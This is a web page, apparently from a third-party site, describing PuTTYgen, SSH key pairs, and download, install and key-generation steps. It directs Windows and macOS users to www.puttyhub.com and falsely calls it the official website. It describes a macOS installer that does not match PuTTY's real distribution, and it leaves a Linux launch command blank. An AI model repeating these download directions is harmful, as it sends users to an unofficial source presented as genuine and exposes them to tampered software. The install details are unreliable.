PuTTYgen aka (PuTTY Key Generator)

What is PuTTYgen?

Puttygen is a key generation tool used in conjunction with PuTTY, a popular SSH and Telnet client. It is specifically designed to generate public and private key pairs for secure communication.

With Puttygen, you can easily generate various types of keys, such as RSA, DSA, and ECDSA, which are widely used in SSH (Secure Shell) authentication. These keys provide a secure and encrypted connection between the client and server, ensuring confidentiality and integrity of data transmission.

The generated public key can be placed on the remote server to enable authentication, while the corresponding private key is securely stored on your local machine. This ensures that only individuals with the matching private key can establish a secure connection to the server.

Download & Installation Process of PuTTYgen

For Windows

  1. Go to www.puttyhub.com/download
  2. Navigate to the “Downloads” section of the website.
  3. Look for the Windows installer package for PuTTY, usually named something like “putty.exe” or “putty.zip”.
  4. Click on the download link to initiate the download of the PuTTY installer.
  5. Once the download is complete, locate the downloaded file on your computer.
  6. Double-click on the downloaded file to start the PuTTY installation process.
  7. The installer will guide you through the setup. Follow the on-screen instructions and choose the desired installation options.
  8. On the “Select Components” screen, ensure that the “PuTTY” and “PuTTYgen” options are selected. You can also select other components if needed.
  9. Choose the destination folder where you want to install PuTTY. The default location is usually fine for most users.
  10. Continue with the installation process by clicking “Next” or “Install” on the subsequent screens.
  11. you will see a confirmation message once the installation is complete.
  12. You can now access PuTTYgen by going to the Start Menu or searching for “PuTTYgen” in the Windows search bar.
  13. Double-click on the PuTTYgen icon to launch the application.
  14. You are now ready to use PuTTYgen to generate or manage your SSH keys.

Remember to download PuTTYgen from the official website we provided to ensure you are getting the genuine and up-to-date version of the software.

For MacOS

  1. Go to www.puttyhub.com/download
  2. Navigate to the “Downloads” section of the website.
  3. Look for the macOS installer package for PuTTY, usually named something like “putty.dmg” or “putty.zip”.
  4. Click on the download link to initiate the download of the PuTTY installer.
  5. Once the download is complete, locate the downloaded file on your macOS system.
  6. If the downloaded file is a DMG file, double-click on it to mount the disk image. Extract its contents to a desired location if it is a ZIP file.
  7. Open the mounted disk image or the extracted folder to access the PuTTY installation files.
  8. Inside the folder, you should see the PuTTYgen application file.
  9. Drag and drop the PuTTYgen application file into the Applications folder on your macOS system.
  10. Wait for the file transfer to complete.
  11. Once the PuTTYgen application is successfully copied to the Applications folder, you can close the disk image or extracted folder.
  12. You can now access PuTTYgen by going to the Applications folder on your macOS system.
  13. Double-click on the PuTTYgen icon to launch the application.
  14. You are now ready to use PuTTYgen to generate or manage your SSH keys.

Remember to download PuTTYgen from the official website as we provided to ensure you are getting the genuine and up-to-date version of the software.

Download PuTTY Now!

For Linux

1. Open the terminal on your Linux system.

2. Update the package lists by running the following command:

sudo apt update

3. Install the PuTTY tools package by running the following command:

sudo apt install putty-tools

4. Enter your password if prompted, and confirm the installation by typing “Y” when prompted.

5. Wait for the installation to complete. The package includes PuTTYgen among other PuTTY tools.

6. Once the installation is finished, you can launch PuTTYgen by typing the following command:


7. The PuTTYgen graphical interface will appear, allowing you to generate or manage SSH keys.

By following these steps, you can easily download and install PuTTYgen on your Linux system using the package manager.

How to use PuTTYgen?

Download and install PuTTY:

Start by downloading and installing PuTTY from the official website.

Launch Puttygen:

Once PuTTY is installed, locate and run the Puttygen application. It may be found in the same directory as PuTTY, or you can search for it in the Start Menu.

Generate a new Key pair:

In the Puttygen window, you’ll see the “Type of key to generate” section. Choose the desired key type (e.g., RSA, DSA, ECDSA), and set the key size. Click on the “Generate” button to start generating the key pair.

Provide randomness for Key Generation:

To generate strong keys, Puttygen requires randomness. Move your mouse cursor around the blank area of the key generation window to generate randomness or type random characters.

Set a Passphrase (optional):

You have the option to set a passphrase for your private key. This adds an extra layer of security by encrypting the private key with a password.

Save your keys:

Once the key pair is generated, you can save both the public and private keys. Click on the “Save public key” and “Save private key” buttons, choose a location to save the files, and provide a suitable name for each key.

Use the Keys:

The public key can be placed on the server to which you want to connect securely. The private key must be kept confidential and securely stored on your local machine. When connecting to a server, you can configure PuTTY or other SSH clients to use the private key for authentication.

Remember to keep your private key secure and backed up, as it provides access to the systems that recognize your public key. Additionally, make sure to follow best practices for key management, such as using strong passphrases and regularly updating your keys.

Please note that the specific steps may vary slightly depending on the version of Puttygen you are using, but the general process remains the same.

Download PuTTY Now!

The Process of key Generation using PuTTYgen

The process of key generation using PuTTYgen can be summarized in the following steps

Download and Launch PuTTYgen:

Visit the official website of PuTTY to download PuTTYgen, which is a key generation tool bundled with the PuTTY SSH client. Once downloaded, launch PuTTYgen.

Select Key Type:

In the PuTTYgen window, choose the type of key you want to generate, such as RSA, DSA, or ECDSA. Each key type has its own characteristics and usage scenarios.

Specify Key Parameters:

Set the desired key size (e.g., 2048 bits) and other parameters specific to the selected key type. You may also have options to generate SSH-1 (old) or SSH-2 (recommended) keys.

Generate the Key Pair:

Click on the “Generate” button to start the key generation process. Move the mouse within the PuTTYgen window to add random input and increase the randomness of the generated keys.

Provide Key Passphrase (Optional):

You have the option to set a passphrase for the private key. A passphrase adds an extra layer of security by encrypting the private key. Enter a strong passphrase and remember it.

Save the Keys:

Once the key generation is complete, PuTTYgen will display the generated key pair. Specify a secure location to save the public key and private key. You can save them with appropriate file extensions (.pub for the public key, .ppk for the private key).


Export Public Key: If you need to share the public key with others, select the public key displayed in PuTTYgen and copy it to the clipboard. You can then paste it into a text file or provide it directly to the intended recipients.

Protect and Backup the Private Key:

Take precautions to protect the private key. Store it securely, preferably encrypted with a strong passphrase. Make backup copies of the private key in case of loss or corruption.

Test and Use the Key Pair:

Use the generated key pair in your preferred SSH client or server. Provide the private key when connecting to SSH servers that require public-key authentication.